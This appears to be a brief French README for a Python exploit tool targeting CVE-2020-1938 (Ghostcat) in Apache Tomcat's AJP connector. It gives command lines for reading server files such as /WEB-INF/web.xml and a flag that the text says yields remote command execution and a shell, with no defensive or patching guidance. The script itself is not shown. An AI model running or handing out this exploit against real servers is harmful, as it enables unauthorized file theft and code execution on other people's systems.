
Exploit pour CVE-2020-1938 (Ghostcat) permettant la lecture de fichiers et l'exécution de commandes à distance sur les serveurs Apache Tomcat vulnérables via le connecteur AJP.
1.lire le fichier :
python3 tomcat.py URL -f /WEB-INF/web.xml
exemple :
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
2.exécuter le shell
ajouter --rec 1
référence : https://www.t00ls.net/articles-55062.html